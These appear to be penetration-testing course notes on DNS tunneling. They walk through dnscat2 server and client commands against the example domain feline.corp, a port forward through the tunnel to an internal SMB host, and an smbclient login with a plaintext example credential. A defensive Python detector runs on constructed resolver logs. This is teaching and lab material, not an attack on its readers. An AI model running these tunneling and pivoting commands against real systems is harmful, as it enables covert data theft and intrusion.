DNS Tunneling Theory & Practice
20.3.1 - DNS tunneling fundamentals
Check the current DNS resolver settings:
resolvectl status
Use nslookup to make DNS requests (first a default A lookup, then a TXT lookup):
nslookup exfiltrated-data.feline.corp
nslookup -type=txt www.feline.corp
20.3.2 - DNS tunneling with DNSCat
We can use dnscat2 to exfiltrate data in DNS subdomain queries and infiltrate data through TXT (and other) record responses. Note that DNS tunneling generates a lot of DNS traffic and is not stealthy.
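Because the tunnel rides on ordinary queries to a domain we control, the defender's view is the resolver log: long, high-entropy subdomain labels, almost no repeated names, and an unusual share of TXT lookups against one parent domain. The following heuristic detector is an added example, not code from the course notes or from dnscat2; it assumes BIND-style query-log lines ("client <ip>#<port>: query: <qname> IN <qtype> ..."), the sample log lines are constructed here so the script runs offline, and the thresholds are illustrative values rather than tuned production settings.

```python
"""Heuristic detector for DNS-tunnel-like query patterns in resolver logs.

Added example (not from the course or dnscat2). Assumes BIND-style query
log lines; the sample below is constructed so the script runs offline.
feline.corp is the page's example tunnel domain.
"""
import math
import re
from collections import defaultdict

# Constructed sample log: a few ordinary lookups plus a burst of tunnel-style
# queries (long hex-like labels, all unique, mostly TXT) against feline.corp.
SAMPLE_LOG = """\
client 10.0.0.5#53412: query: www.example.com IN A + (10.0.0.2)
client 10.0.0.5#53413: query: mail.example.com IN MX + (10.0.0.2)
client 10.0.0.5#53414: query: www.feline.corp IN A + (10.0.0.2)
client 10.0.0.9#40001: query: 4f1b9c2e7a3d5e6f8091a2b3c4d5e6f7.feline.corp IN TXT + (10.0.0.2)
client 10.0.0.9#40002: query: 9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c4d.feline.corp IN TXT + (10.0.0.2)
client 10.0.0.9#40003: query: 0f1e2d3c4b5a69788796a5b4c3d2e1f0.feline.corp IN TXT + (10.0.0.2)
client 10.0.0.9#40004: query: deadbeefcafef00d0123456789abcdef.feline.corp IN TXT + (10.0.0.2)
client 10.0.0.9#40005: query: 13579bdf02468ace13579bdf02468ace.feline.corp IN TXT + (10.0.0.2)
client 10.0.0.9#40006: query: fedcba9876543210fedcba9876543210.feline.corp IN TXT + (10.0.0.2)
client 10.0.0.5#53415: query: intranet.example.com IN A + (10.0.0.2)
"""

# BIND query-log layout (assumed): "client <ip>#<port>: query: <qname> IN <qtype> ..."
QUERY_RE = re.compile(r"client (?P<src>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")


def shannon_entropy(s):
    """Bits of entropy per character; encoded payloads score high, words score low."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parent_domain(qname, levels=2):
    """Group queries by their last `levels` labels (e.g. feline.corp)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-levels:])


def parse_log(text):
    """Return (source_ip, qname, qtype) tuples for every query line that matches."""
    records = []
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            records.append((m["src"], m["qname"].lower(), m["qtype"].upper()))
    return records


def score_domains(records, min_queries=5, min_unique_ratio=0.8,
                  min_label_len=24, min_entropy=3.0, min_txt_ratio=0.5):
    """Flag parent domains whose query mix looks like a tunnel.

    A domain is reported when at least two of the four heuristics fire; the
    thresholds are illustrative assumptions, not tuned production values.
    """
    by_domain = defaultdict(list)
    for src, qname, qtype in records:
        by_domain[parent_domain(qname)].append((src, qname, qtype))

    findings = {}
    for dom, qs in by_domain.items():
        if len(qs) < min_queries:          # too little traffic to judge
            continue
        subdomains = {q for _, q, _ in qs}
        leftmost = [q.split(".")[0] for q in subdomains]
        stats = {
            "queries": len(qs),
            "unique_subdomains": len(subdomains),
            "unique_ratio": len(subdomains) / len(qs),
            "avg_label_len": sum(len(l) for l in leftmost) / len(leftmost),
            "avg_label_entropy": sum(shannon_entropy(l) for l in leftmost) / len(leftmost),
            "txt_ratio": sum(1 for _, _, t in qs if t == "TXT") / len(qs),
        }
        reasons = []
        if stats["unique_ratio"] >= min_unique_ratio:
            reasons.append("almost every query is a never-before-seen name")
        if stats["avg_label_len"] >= min_label_len:
            reasons.append("leftmost labels are unusually long")
        if stats["avg_label_entropy"] >= min_entropy:
            reasons.append("leftmost labels look like encoded data")
        if stats["txt_ratio"] >= min_txt_ratio:
            reasons.append("high share of TXT lookups")
        if len(reasons) >= 2:
            stats["reasons"] = reasons
            findings[dom] = stats
    return findings


if __name__ == "__main__":
    for dom, st in score_domains(parse_log(SAMPLE_LOG)).items():
        print(f"{dom}: {st['queries']} queries, {st['unique_subdomains']} unique names")
        for r in st["reasons"]:
            print("  -", r)
```

On the constructed sample only feline.corp is reported (example.com has too few queries to judge); all four heuristics fire for it. In practice the volume heuristic is the strongest signal, since a working tunnel needs far more queries per minute than any legitimate client sends to one domain, so a per-source rate check over a time window is the natural next addition.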
Run the dnscat2 server (in our example on remote machine 1):
dnscat2-server feline.corp
Then run the dnscat2 client binary from the dnscat folder in the database_admin home directory. We should then see a new session for the target appear in the dnscat2 server window:
./dnscat feline.corp
List the active windows in dnscat2, then interact with window 1:
window
window -i 1
We can set up tunneling options such as a local port forward (here local port 4455 is forwarded through the tunnel to 172.16.2.11:445):
listen 127.0.0.1:4455 172.16.2.11:445
We can then try listing SMB shares through this port forward, as in the example:
smbclient -p 4455 -L //127.0.0.1 -U hr_admin --password=Welcome1234